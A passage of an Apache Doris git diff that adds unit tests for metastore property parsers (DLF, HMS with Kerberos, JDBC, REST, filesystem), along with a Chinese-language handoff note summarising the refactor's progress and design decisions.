"dlf.secret_key", "sk", "dlf.region", "cn-hangzhou", + "dlf.access.public", "true", "warehouse", "wh"), Collections.emptyMap()); + Assertions.assertEquals("dlf.cn-hangzhou.aliyuncs.com", props.toDlfCatalogConf().get("dlf.catalog.endpoint")); + } + + @Test + public void explicitEndpointAndCatalogIdWin() { + DlfMetaStorePropertiesImpl props = DlfMetaStorePropertiesImpl.of(raw( + "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.endpoint", "dlf.my.endpoint", + "dlf.catalog.uid", "u", "dlf.catalog.id", "cid", "warehouse", "wh"), Collections.emptyMap()); + Map conf = props.toDlfCatalogConf(); + Assertions.assertEquals("dlf.my.endpoint", conf.get("dlf.catalog.endpoint")); + Assertions.assertEquals("cid", conf.get("dlf.catalog.id")); + } + + @Test + public void overlaysStorageHadoopConfig() { + Map storage = new HashMap<>(); + storage.put("fs.oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"); + DlfMetaStorePropertiesImpl props = DlfMetaStorePropertiesImpl.of(raw( + "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.endpoint", "e", "warehouse", "wh"), storage); + Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", props.toDlfCatalogConf().get("fs.oss.endpoint")); + } + + @Test + public void validateInOrderWarehouseAkSkEndpointOss() { + Assertions.assertEquals("Property warehouse is required.", + Assertions.assertThrows(IllegalArgumentException.class, + () -> DlfMetaStorePropertiesImpl.of(raw("dlf.access_key", "ak"), Collections.emptyMap()) + .validate()).getMessage()); + Assertions.assertEquals("dlf.access_key is required", + Assertions.assertThrows(IllegalArgumentException.class, + () -> DlfMetaStorePropertiesImpl.of(raw("warehouse", "wh"), Collections.emptyMap()) + .validate()).getMessage()); + Assertions.assertEquals("dlf.secret_key is required", + Assertions.assertThrows(IllegalArgumentException.class, + () -> DlfMetaStorePropertiesImpl.of(raw("warehouse", "wh", "dlf.access_key", "ak"), + Collections.emptyMap()).validate()).getMessage()); + Assertions.assertEquals("dlf.endpoint is required.", + Assertions.assertThrows(IllegalArgumentException.class, + () -> DlfMetaStorePropertiesImpl.of(raw("warehouse", "wh", "dlf.access_key", "ak", + "dlf.secret_key", "sk"), Collections.emptyMap()).validate()).getMessage()); + Assertions.assertEquals("Paimon DLF metastore requires OSS storage properties.", + Assertions.assertThrows(IllegalArgumentException.class, + () -> DlfMetaStorePropertiesImpl.of(raw("warehouse", "wh", "dlf.access_key", "ak", + "dlf.secret_key", "sk", "dlf.region", "cn-hangzhou"), Collections.emptyMap()) + .validate()).getMessage()); + // valid: OSS storage key present + DlfMetaStorePropertiesImpl.of(raw("warehouse", "wh", "dlf.access_key", "ak", "dlf.secret_key", "sk", + "dlf.region", "cn-hangzhou", "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"), + Collections.emptyMap()).validate(); + } + + @Test + public void rejectsS3OnlyStorageButAcceptsPaimonFsOss() { + // Documented anti-regression: an S3-only DLF catalog (no oss.* key) must be REJECTED. + Assertions.assertEquals("Paimon DLF metastore requires OSS storage properties.", + Assertions.assertThrows(IllegalArgumentException.class, + () -> DlfMetaStorePropertiesImpl.of(raw("warehouse", "wh", "dlf.access_key", "ak", + "dlf.secret_key", "sk", "dlf.region", "cn", "fs.s3a.access.key", "x"), + Collections.emptyMap()).validate()).getMessage()); + // paimon.fs.oss.* counts as OSS storage -> accepted. + DlfMetaStorePropertiesImpl.of(raw("warehouse", "wh", "dlf.access_key", "ak", "dlf.secret_key", "sk", + "dlf.region", "cn", "paimon.fs.oss.endpoint", "oss-ep"), Collections.emptyMap()).validate(); + } + + @Test + public void proxyModeUserOverrideCarriesThrough() { + DlfMetaStorePropertiesImpl props = DlfMetaStorePropertiesImpl.of(raw( + "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.endpoint", "e", + "dlf.proxy.mode", "DLF_AND_HMS", "warehouse", "wh"), Collections.emptyMap()); + Assertions.assertEquals("DLF_AND_HMS", props.toDlfCatalogConf().get("dlf.catalog.proxyMode")); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStorePropertiesTest.java b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStorePropertiesTest.java new file mode 100644 index 00000000000000..fe5fc8a7c66321 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStorePropertiesTest.java @@ -0,0 +1,49 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.fs; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** T2 parity for the filesystem backend (legacy {@code PaimonFileSystemMetaStoreProperties}). */ +public class FileSystemMetaStorePropertiesTest { + + @Test + public void carriesWarehouseAndDeclaresStorageNeeded() { + Map raw = new HashMap<>(); + raw.put("warehouse", "oss://bucket/wh"); + FileSystemMetaStorePropertiesImpl props = FileSystemMetaStorePropertiesImpl.of(raw); + + Assertions.assertEquals("FILESYSTEM", props.providerName()); + Assertions.assertEquals("oss://bucket/wh", props.getWarehouse()); + Assertions.assertTrue(props.needsStorage()); + props.validate(); // no throw + Assertions.assertEquals("oss://bucket/wh", props.matchedProperties().get("warehouse")); + Assertions.assertEquals(raw, props.rawProperties()); + } + + @Test + public void validateRequiresWarehouse() { + FileSystemMetaStorePropertiesImpl props = FileSystemMetaStorePropertiesImpl.of(new HashMap<>()); + IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, props::validate); + Assertions.assertEquals("Property warehouse is required.", ex.getMessage()); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesTest.java b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesTest.java new file mode 100644 index 00000000000000..f16741ad566bc5 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesTest.java @@ -0,0 +1,239 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.hms; + +import org.apache.doris.kerberos.AuthType; +import org.apache.doris.kerberos.KerberosAuthSpec; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; + +/** T2 parity for the HMS backend (legacy {@code HMSBaseProperties}/{@code buildHmsHiveConf}). */ +public class HmsMetaStorePropertiesTest { + + private static Map raw(String... kv) { + Map m = new HashMap<>(); + for (int i = 0; i < kv.length; i += 2) { + m.put(kv[i], kv[i + 1]); + } + return m; + } + + private static HmsMetaStorePropertiesImpl of(Map raw) { + return HmsMetaStorePropertiesImpl.of(raw, Collections.emptyMap()); + } + + @Test + public void simpleEmitsUriAndSocketTimeoutOnly() { + HmsMetaStorePropertiesImpl props = of(raw("hive.metastore.uris", "thrift://h:9083", "warehouse", "wh")); + + Assertions.assertEquals("HMS", props.providerName()); + Assertions.assertTrue(props.needsStorage()); + Assertions.assertEquals("thrift://h:9083", props.getUri()); + Assertions.assertEquals(AuthType.SIMPLE, props.getAuthType()); + Assertions.assertFalse(props.kerberos().isPresent()); + + Map conf = props.toHiveConfOverrides(); + Assertions.assertEquals("thrift://h:9083", conf.get("hive.metastore.uris")); + Assertions.assertEquals("10", conf.get("hive.metastore.client.socket.timeout")); + // No kerberos leakage on a simple catalog. + Assertions.assertFalse(conf.containsKey("hadoop.security.authentication")); + Assertions.assertFalse(conf.containsKey("hive.metastore.sasl.enabled")); + Assertions.assertEquals(2, conf.size()); + } + + @Test + public void kerberosEmitsServicePrincipalSaslAndCarriesClientFacts() { + HmsMetaStorePropertiesImpl props = of(raw( + "hive.metastore.uris", "thrift://h:9083", + "hive.metastore.authentication.type", "kerberos", + "hive.metastore.client.principal", "doris@REALM", + "hive.metastore.client.keytab", "/etc/doris.keytab", + "hive.metastore.service.principal", "hive/_HOST@REALM", + "hadoop.security.auth_to_local", "RULE:[1:$1]", + "warehouse", "wh")); + + Map conf = props.toHiveConfOverrides(); + Assertions.assertEquals("kerberos", conf.get("hive.metastore.authentication.type")); + Assertions.assertEquals("doris@REALM", conf.get("hive.metastore.client.principal")); + Assertions.assertEquals("/etc/doris.keytab", conf.get("hive.metastore.client.keytab")); + Assertions.assertEquals("hive/_HOST@REALM", conf.get("hive.metastore.kerberos.principal")); + Assertions.assertEquals("RULE:[1:$1]", conf.get("hadoop.security.auth_to_local")); + Assertions.assertEquals("kerberos", conf.get("hadoop.security.authentication")); + Assertions.assertEquals("true", conf.get("hive.metastore.sasl.enabled")); + + Assertions.assertEquals(AuthType.KERBEROS, props.getAuthType()); + Optional krb = props.kerberos(); + Assertions.assertTrue(krb.isPresent()); + Assertions.assertEquals("doris@REALM", krb.get().getPrincipal()); + Assertions.assertEquals("/etc/doris.keytab", krb.get().getKeytab()); + Assertions.assertTrue(krb.get().hasCredentials()); + } + + @Test + public void kerberosBlockRunsAfterStorageOverlaySoItIsNotClobbered() { + // User sets a raw hadoop.security.authentication=simple (storage passthrough); the kerberos + // block must run LAST and force it back to kerberos (legacy ordering invariant). + HmsMetaStorePropertiesImpl props = of(raw( + "hive.metastore.uris", "thrift://h:9083", + "hive.metastore.authentication.type", "kerberos", + "hive.metastore.client.principal", "p", "hive.metastore.client.keytab", "k", + "hadoop.security.authentication", "simple", + "warehouse", "wh")); + Map conf = props.toHiveConfOverrides(); + Assertions.assertEquals("kerberos", conf.get("hadoop.security.authentication")); + Assertions.assertEquals("true", conf.get("hive.metastore.sasl.enabled")); + } + + @Test + public void hdfsKerberosFallbackWhenMetastoreAuthIsNotSet() { + HmsMetaStorePropertiesImpl props = of(raw( + "hive.metastore.uris", "thrift://h:9083", + "hadoop.security.authentication", "kerberos", + "hadoop.kerberos.principal", "hdfs@REALM", + "hadoop.kerberos.keytab", "/etc/hdfs.keytab", + "warehouse", "wh")); + Map conf = props.toHiveConfOverrides(); + Assertions.assertEquals("kerberos", conf.get("hadoop.security.authentication")); + Assertions.assertEquals("true", conf.get("hive.metastore.sasl.enabled")); + // Metastore auth type itself is unset -> SIMPLE, but the effective kerberos facts come from HDFS. + Assertions.assertEquals(AuthType.SIMPLE, props.getAuthType()); + Optional krb = props.kerberos(); + Assertions.assertTrue(krb.isPresent()); + Assertions.assertEquals("hdfs@REALM", krb.get().getPrincipal()); + Assertions.assertEquals("/etc/hdfs.keytab", krb.get().getKeytab()); + } + + @Test + public void usernameAliasResolvesToHadoopUsername() { + Map conf = of(raw( + "hive.metastore.uris", "thrift://h", "hive.metastore.username", "bob", "warehouse", "wh")) + .toHiveConfOverrides(); + Assertions.assertEquals("bob", conf.get("hadoop.username")); + } + + @Test + public void validateChecksWarehouseThenUriThenAuthRules() { + Assertions.assertEquals("Property warehouse is required.", + Assertions.assertThrows(IllegalArgumentException.class, + () -> of(raw("hive.metastore.uris", "thrift://h")).validate()).getMessage()); + Assertions.assertEquals("hive.metastore.uris or uri is required", + Assertions.assertThrows(IllegalArgumentException.class, + () -> of(raw("warehouse", "wh")).validate()).getMessage()); + // forbidIf simple + Assertions.assertEquals("hive.metastore.client.principal and hive.metastore.client.keytab cannot be set when " + + "hive.metastore.authentication.type is simple", + Assertions.assertThrows(IllegalArgumentException.class, + () -> of(raw("warehouse", "wh", "hive.metastore.uris", "thrift://h", + "hive.metastore.authentication.type", "simple", + "hive.metastore.client.principal", "p")).validate()).getMessage()); + // requireIf kerberos (missing keytab) + Assertions.assertEquals("hive.metastore.client.principal and hive.metastore.client.keytab are required when " + + "hive.metastore.authentication.type is kerberos", + Assertions.assertThrows(IllegalArgumentException.class, + () -> of(raw("warehouse", "wh", "hive.metastore.uris", "thrift://h", + "hive.metastore.authentication.type", "kerberos", + "hive.metastore.client.principal", "p")).validate()).getMessage()); + // valid simple (no client creds) + of(raw("warehouse", "wh", "hive.metastore.uris", "thrift://h", + "hive.metastore.authentication.type", "simple")).validate(); + } + + @Test + public void authTypeMatchIsCaseSensitiveMirroringParamRules() { + // ParamRules.forbidIf uses Objects.equals (case-sensitive): "Simple" != "simple", so the + // forbid rule must NOT fire even though client.principal is set. (A mutation to equalsIgnoreCase + // would make this throw.) + of(raw("warehouse", "wh", "hive.metastore.uris", "thrift://h", + "hive.metastore.authentication.type", "Simple", + "hive.metastore.client.principal", "p")).validate(); + } + + @Test + public void storageOverlayRunsBeforeKerberosBlockViaStorageMapChannel() { + // The clobber candidate arrives ONLY via the storageHadoopConfig map (not raw), so this pins the + // DV-007 invariant through the actual storage channel: step-5 overlay (which writes simple) MUST + // run before step-6 kerberos (which forces kerberos). The marker proves the overlay ran at all. + Map storage = new HashMap<>(); + storage.put("hadoop.security.authentication", "simple"); + storage.put("fs.s3a.marker", "ran"); + Map conf = HmsMetaStorePropertiesImpl.of(raw( + "hive.metastore.uris", "thrift://h", + "hive.metastore.authentication.type", "kerberos", + "hive.metastore.client.principal", "p", "hive.metastore.client.keytab", "k", + "warehouse", "wh"), storage).toHiveConfOverrides(); + Assertions.assertEquals("ran", conf.get("fs.s3a.marker")); + Assertions.assertEquals("kerberos", conf.get("hadoop.security.authentication")); + } + + @Test + public void uriPrefersFirstAlias() { + // names = {"hive.metastore.uris", "uri"} -> first alias wins when both are set. + Assertions.assertEquals("thrift://first", + of(raw("hive.metastore.uris", "thrift://first", "uri", "thrift://second", "warehouse", "wh")) + .getUri()); + } + + @Test + public void usernameAliasOverwritesStorageHadoopUsername() { + // Storage overlay (step 5) writes hadoop.username from the storage map; step 7 (after the overlay) + // must overwrite it with the resolved username alias. + Map storage = new HashMap<>(); + storage.put("hadoop.username", "from-storage"); + Map conf = HmsMetaStorePropertiesImpl.of(raw( + "hive.metastore.uris", "thrift://h", "hive.metastore.username", "bob", "warehouse", "wh"), + storage).toHiveConfOverrides(); + Assertions.assertEquals("bob", conf.get("hadoop.username")); + } + + @Test + public void hdfsKerberosFallbackSuppressedWhenMetastoreAuthIsSimple() { + // auth type explicitly "simple" -> the HDFS-kerberos fallback must NOT fire (the !simple guard). + HmsMetaStorePropertiesImpl props = of(raw( + "hive.metastore.uris", "thrift://h", + "hive.metastore.authentication.type", "simple", + "hadoop.security.authentication", "kerberos", + "hadoop.kerberos.principal", "hdfs@REALM", "hadoop.kerberos.keytab", "/k", + "warehouse", "wh")); + Assertions.assertFalse(props.kerberos().isPresent()); + Assertions.assertFalse(props.toHiveConfOverrides().containsKey("hive.metastore.sasl.enabled")); + } + + @Test + public void userSuppliedSocketTimeoutSurvivesTheDefault() { + Map conf = of(raw( + "hive.metastore.uris", "thrift://h", "hive.metastore.client.socket.timeout", "30", + "warehouse", "wh")).toHiveConfOverrides(); + Assertions.assertEquals("30", conf.get("hive.metastore.client.socket.timeout")); + } + + @Test + public void matchedPropertiesIncludesMatchedAliasesAndExcludesUnmatched() { + Map matched = of(raw( + "hive.metastore.uris", "thrift://h", "warehouse", "wh", "some.random.key", "v")) + .matchedProperties(); + Assertions.assertEquals("thrift://h", matched.get("hive.metastore.uris")); + Assertions.assertEquals("wh", matched.get("warehouse")); + Assertions.assertFalse(matched.containsKey("some.random.key")); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStorePropertiesTest.java b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStorePropertiesTest.java new file mode 100644 index 00000000000000..a622a80100d657 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStorePropertiesTest.java @@ -0,0 +1,100 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.jdbc; + +import org.apache.doris.connector.metastore.spi.JdbcDriverSupport; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** T2 parity for the JDBC backend (legacy {@code PaimonJdbcMetaStoreProperties}) + driver-url resolution. */ +public class JdbcMetaStorePropertiesTest { + + private static Map raw(String... kv) { + Map m = new HashMap<>(); + for (int i = 0; i < kv.length; i += 2) { + m.put(kv[i], kv[i + 1]); + } + return m; + } + + @Test + public void gettersReturnRawAliasResolvedValues() { + JdbcMetaStorePropertiesImpl props = JdbcMetaStorePropertiesImpl.of(raw( + "uri", "jdbc:mysql://h:3306/db", + "paimon.jdbc.user", "u", + "paimon.jdbc.password", "p", + "paimon.jdbc.driver_url", "mysql-connector.jar", + "paimon.jdbc.driver_class", "com.mysql.cj.jdbc.Driver", + "warehouse", "wh")); + + Assertions.assertEquals("JDBC", props.providerName()); + Assertions.assertFalse(props.needsStorage()); + Assertions.assertEquals("jdbc:mysql://h:3306/db", props.getUri()); + Assertions.assertEquals("u", props.getUser()); + Assertions.assertEquals("p", props.getPassword()); + // RAW driver url (resolution is consumer-side via JdbcDriverSupport). + Assertions.assertEquals("mysql-connector.jar", props.getDriverUrl()); + Assertions.assertEquals("com.mysql.cj.jdbc.Driver", props.getDriverClass()); + } + + @Test + public void validateChecksWarehouseThenUriThenDriverClass() { + Assertions.assertEquals("Property warehouse is required.", + Assertions.assertThrows(IllegalArgumentException.class, + () -> JdbcMetaStorePropertiesImpl.of(raw("uri", "jdbc:x")).validate()).getMessage()); + Assertions.assertEquals("uri or paimon.jdbc.uri is required", + Assertions.assertThrows(IllegalArgumentException.class, + () -> JdbcMetaStorePropertiesImpl.of(raw("warehouse", "wh")).validate()).getMessage()); + Assertions.assertEquals("jdbc.driver_class or paimon.jdbc.driver_class is required when " + + "jdbc.driver_url or paimon.jdbc.driver_url is specified", + Assertions.assertThrows(IllegalArgumentException.class, + () -> JdbcMetaStorePropertiesImpl.of(raw( + "warehouse", "wh", "uri", "jdbc:x", "paimon.jdbc.driver_url", "d.jar")).validate()) + .getMessage()); + } + + @Test + public void resolveDriverUrl() { + Map env = new HashMap<>(); + // already scheme-bearing -> as-is + Assertions.assertEquals("https://host/d.jar", JdbcDriverSupport.resolveDriverUrl("https://host/d.jar", env)); + // absolute path -> as-is (no driversDir prepend) + Assertions.assertEquals("/opt/drivers/d.jar", JdbcDriverSupport.resolveDriverUrl("/opt/drivers/d.jar", env)); + // bare jar with explicit drivers dir + env.put("jdbc_drivers_dir", "/custom/drivers"); + Assertions.assertEquals("file:///custom/drivers/d.jar", JdbcDriverSupport.resolveDriverUrl("d.jar", env)); + // bare jar falling back to doris_home/plugins/jdbc_drivers + Map env2 = new HashMap<>(); + env2.put("doris_home", "/dh"); + Assertions.assertEquals("file:///dh/plugins/jdbc_drivers/d.jar", JdbcDriverSupport.resolveDriverUrl("d.jar", env2)); + // empty env -> doris_home defaults to "." + Assertions.assertEquals("file://./plugins/jdbc_drivers/d.jar", + JdbcDriverSupport.resolveDriverUrl("d.jar", new HashMap<>())); + } + + @Test + public void uriPrefersFirstAlias() { + // names = {"uri", "paimon.jdbc.uri"} -> the plain "uri" wins when both are set. + Assertions.assertEquals("jdbc:a", JdbcMetaStorePropertiesImpl.of(raw( + "uri", "jdbc:a", "paimon.jdbc.uri", "jdbc:b", "warehouse", "wh")).getUri()); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStorePropertiesTest.java b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStorePropertiesTest.java new file mode 100644 index 00000000000000..23a26ff80c987b --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStorePropertiesTest.java @@ -0,0 +1,94 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.rest; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** T2 parity for the REST backend (legacy {@code PaimonRestMetaStoreProperties} / {@code appendRestOptions}). */ +public class RestMetaStorePropertiesTest { + + private static Map raw(String... kv) { + Map m = new HashMap<>(); + for (int i = 0; i < kv.length; i += 2) { + m.put(kv[i], kv[i + 1]); + } + return m; + } + + @Test + public void toRestOptionsStripsPaimonRestPrefix() { + RestMetaStorePropertiesImpl props = RestMetaStorePropertiesImpl.of(raw( + "paimon.rest.uri", "http://rest:8080", + "paimon.rest.token.provider", "dlf", + "warehouse", "wh")); + + Assertions.assertEquals("REST", props.providerName()); + Assertions.assertFalse(props.needsStorage()); + Assertions.assertEquals("http://rest:8080", props.getUri()); + + Map opts = props.toRestOptions(); + Assertions.assertEquals("http://rest:8080", opts.get("uri")); + Assertions.assertEquals("dlf", opts.get("token.provider")); + // Raw catalog keys (warehouse) are NOT REST options. + Assertions.assertFalse(opts.containsKey("warehouse")); + } + + @Test + public void uriAliasResolvesFromPlainUri() { + RestMetaStorePropertiesImpl props = RestMetaStorePropertiesImpl.of(raw("uri", "http://plain", "warehouse", "wh")); + Assertions.assertEquals("http://plain", props.getUri()); + Assertions.assertEquals("http://plain", props.toRestOptions().get("uri")); + } + + @Test + public void validateChecksWarehouseThenUriThenDlfToken() { + // warehouse first (shared, legacy parity) + Assertions.assertEquals("Property warehouse is required.", + Assertions.assertThrows(IllegalArgumentException.class, + () -> RestMetaStorePropertiesImpl.of(raw("paimon.rest.uri", "http://r")).validate()) + .getMessage()); + // then uri + Assertions.assertEquals("paimon.rest.uri or uri is required", + Assertions.assertThrows(IllegalArgumentException.class, + () -> RestMetaStorePropertiesImpl.of(raw("warehouse", "wh")).validate()).getMessage()); + // then the DLF token-provider rule + Assertions.assertEquals("DLF token provider requires 'paimon.rest.dlf.access-key-id' " + + "and 'paimon.rest.dlf.access-key-secret'", + Assertions.assertThrows(IllegalArgumentException.class, + () -> RestMetaStorePropertiesImpl.of(raw( + "warehouse", "wh", "paimon.rest.uri", "http://r", + "paimon.rest.token.provider", "dlf")).validate()).getMessage()); + // valid (dlf token with both keys) -> no throw + RestMetaStorePropertiesImpl.of(raw( + "warehouse", "wh", "paimon.rest.uri", "http://r", "paimon.rest.token.provider", "dlf", + "paimon.rest.dlf.access-key-id", "id", "paimon.rest.dlf.access-key-secret", "secret")).validate(); + } + + @Test + public void dlfTokenRuleIsCaseSensitiveMatchingLegacyParamRules() { + // Legacy ParamRules.requireIf uses Objects.equals("dlf", tokenProvider) (case-sensitive), so an + // uppercase "DLF" does NOT trigger the dlf-keys requirement. (The paimon hand-copy's equalsIgnoreCase + // would throw here; we match the authoritative legacy contract.) + RestMetaStorePropertiesImpl.of(raw( + "warehouse", "wh", "paimon.rest.uri", "http://r", "paimon.rest.token.provider", "DLF")).validate(); + } +} diff --git a/fe/fe-connector/pom.xml b/fe/fe-connector/pom.xml index 89640f975717c6..095f02e23b34bb 100644 --- a/fe/fe-connector/pom.xml +++ b/fe/fe-connector/pom.xml @@ -41,6 +41,7 @@ under the License. fe-connector-api fe-connector-spi fe-connector-metastore-api + fe-connector-metastore-spi fe-connector-es fe-connector-trino fe-connector-maxcompute diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 7b3de0c8a5421c..08748f41a0f48d 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,10 +7,12 @@ --- -**更新时间**:2026-06-18(实现 session:FU-T02 + FU-T03 闭环 → **D-012 跳过 P1-T06 进 P2** → **P3a-T01 facts-carrier ✅(fe-kerberos)+ P2-T01 ✅(fe-connector-metastore-api)**;下一步 = **P2-T02**) +**更新时间**:2026-06-18(实现 session:**P2-T02 ✅ 新建 fe-connector-metastore-spi**[5 后端解析器 + Provider SPI/ServiceLoader];下一步 = **P2-T03**[paimon adapter 改走共享解析器]) **更新人**:Claude(Opus 4.8) > **本 session P2 进度补注(最新在最前)**: +> - **P2-T02 ✅(commit 待提交)**:新建 `fe-connector-metastore-spi`(22 文件 = 15 main + 7 test)。**3 边界经 AskUserQuestion 定**:**DV-006**(fe-kerberos = compile-dep only,**零新代码**——recon 三重证伪 HANDOFF 旧写「增量补 authenticator 机制」:产出 `KerberosAuthSpec` 纯 String→值对象不需 hadoop,真 doAs 留 FE 侧 `ctx.executeAuthenticated`)、**DV-007**(parser storage 入参 = 中立 `Map storageHadoopConfig`,**非** `List`;spi **不**依赖 fe-filesystem-api,保持 hadoop/fs-free;parser 拥有 storage-overlay 以守 kerberos-after-storage 序)、全 5 后端一次 commit。**内容**:`MetaStoreProvider

    extends PluginFactory`(`supports`+abstract `bind(props,storageHadoopConfig)`)+ `MetaStoreProviders.bind` first-hit ServiceLoader 派发 + `MetaStoreParseUtils`(firstNonBlank/copyIfPresent/applyStorageConfig/matchedProperties + `CATALOG_TYPE_KEY=paimon.catalog.type`)+ `JdbcDriverSupport.resolveDriverUrl`(**仅纯 resolver**;driver 注册/DriverShim JVM 副作用无调用方 → 留 P2-T03,Rule 2)+ `AbstractMetaStoreProperties`(共享 raw/warehouse/matchedProperties)+ 5 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭 `PaimonConnectorProperties` 手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键,镜像 `S3FileSystemProvider`)+ 单 `META-INF/services`(5 行)。pom = metastore-api + fe-extension-spi + fe-foundation + fe-kerberos + commons-lang3(copy-plugin-deps phase=none)。**来源 = 上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化**(HiveConf→中立 Map、authenticator→facts);**fe-core 旧 `Paimon*MetaStoreProperties` 不动**。**HMS D-4 补回** legacy `HMSBaseProperties.buildRules` 的 forbidIf-simple/requireIf-kerberos(paimon 手抄 validate 漏;**CASE-SENSITIVE `Objects.equals` 对齐 ParamRules**,与 `buildHmsHiveConf` 的 `equalsIgnoreCase` 不对称**保留**)。验证:spi **41/0**、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、白名单干净、**3 mutation RED→GREEN**(HMS 大小写敏感·kerberos-after-storage clobber·REST 大小写敏感)。**对抗 review `wf_2ddae04d-cf9`(4 lens + verify)**:0 BLOCKER;真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 才权威)已修;FS `supports()` 改 `type==null||equalsIgnoreCase`(去 trim 不对称 + 对齐 legacy reject-on-malformed);trim/accessPublic-proxyMode divergence 经核证「对齐权威 legacy contract、仅偏离非权威 paimon 手抄」→不改;补 12 测(storage re-key/clobber-via-storage-channel/alias-first-wins/username-overlay/DLF-S3-reject/dispatch-instanceof…)。**API 旁改 2 javadoc**(`getDriverUrl`「raw,consumer-resolves」+ `needsStorage` FS 准确性,诚实订正,白名单内)。⚠️ **docker 未跑**(T2 真闸 P2-T05)。 +> - **决策补**:D-013(fe-kerberos 先建)|DV-006(kerberos compile-dep-only)|DV-007(storage 中立 Map,spi 不依赖 fe-filesystem-api)。 > - **P2-T01 ✅(commit `44d1fec4dcb`)**:新建 `fe-connector-metastore-api`(`org.apache.doris.connector.metastore`)= `MetaStoreProperties`(`providerName()`+能力方法 `needsStorage()`/`needsVendedCredentials()` 默认 false+`validate()` no-op+`rawProperties()`/`matchedProperties()`,**无 `MetaStoreType` 枚举** D-006)+ 5 子接口 HMS/DLF/REST/JDBC/FileSystem(中立 Map/标量;`HmsMetaStoreProperties` 用 fe-kerberos `AuthType`+`Optional`)。**依赖仅 